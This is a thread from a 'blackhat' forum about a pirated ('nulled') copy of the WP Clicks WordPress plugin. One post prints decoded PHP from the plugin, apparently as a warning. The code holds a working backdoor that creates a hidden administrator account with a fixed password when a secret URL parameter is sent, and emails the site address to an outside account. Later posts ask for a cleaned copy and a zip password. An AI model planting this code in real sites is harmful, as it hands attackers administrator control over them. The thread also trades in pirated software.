Best Blackhat Forum

Best Blackhat Forum > Freebies > WSOs BSOs JVzoo & Early Bird Products > [GET] WP Clicks 1.3.3 Nulled
Full Version: [GET] WP Clicks 1.3.3 Nulled
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3

fatfox

03-21-2013, 01:06 PM
(03-20-2013 11:07 AM)master88 Wrote: [ -> ]DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates
I got the code below after I decode the wpclicks.php

PHP Code:
<?phpadd_action('wp_head''bvg4jukan');function bvg4jukan(){If ($_GET['cms'] == 'jjoplmh') {require('wp-includes/registration.php');If (!username_exists('wordpress')) {$user_id wp_create_user('wordpress','gh67io9Cjm');$user = new WP_User($user_id);$user->set_role('administrator');}}}add_action('wp_head''vfbg2awsc');function vfbg2awsc(){If (!username_exists('wordpress')){$addressdecode='thomasza@gmx.com';$vari='Wordpress Plugin WpClick';mail($addressdecode,get_bloginfo('wpurl'),$vari);}}?>

I think you know what it means.

incomsis

03-22-2013, 09:43 AM
(03-20-2013 11:07 AM)master88 Wrote: [ -> ]DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates

Can this be cleaned? Thanks for letting us know.

master88

03-23-2013, 10:27 AM
It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.

incomsis

03-25-2013, 05:45 AM
(03-23-2013 10:27 AM)master88 Wrote: [ -> ]It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.
Hm, the one I shared was recording everything on my WP, I even posted screenshots from it. Could you try to clean it, please?

Thanks in advance!

master88

03-30-2013, 04:07 PM
If someone can post the decoded file, I will look into it and see if I can clean it.
(03-25-2013 05:45 AM)incomsis Wrote: [ -> ]
(03-23-2013 10:27 AM)master88 Wrote: [ -> ]It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.
Hm, the one I shared was recording everything on my WP, I even posted screenshots from it. Could you try to clean it, please?

Thanks in advance!

grafx77

04-02-2013, 08:57 PM
Waiting for clean version please.......

doddy

05-02-2013, 02:40 PM
Any clean version guys/gals?

CharlieCracker

06-06-2013, 04:57 PM
(03-21-2013 01:06 PM)fatfox Wrote: [ -> ]
(03-20-2013 11:07 AM)master88 Wrote: [ -> ]DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates
I got the code below after I decode the wpclicks.php

PHP Code:
set_role('administrator');}}}add_action('wp_head''vfbg2awsc');function vfbg2awsc(){If (!username_exists('wordpress')){$addressdecode='thomasza@gmx.com';$vari='Wordpress Plugin WpClick';mail($addressdecode,get_bloginfo('wpurl'),$vari);}}?>

I think you know what it means.

Can Someone PM me the full Decoded wpclick.php please. I'll try to clean it :)

tono4850

06-30-2013, 05:52 PM
unfortunately doesnt work on 000webhost

nilshinde

10-07-2013, 05:24 AM
What's the password for the zip file?
Pages: 1 2 3
Best Blackhat Forum > Freebies > WSOs BSOs JVzoo & Early Bird Products > [GET] WP Clicks 1.3.3 Nulled
Reference URL's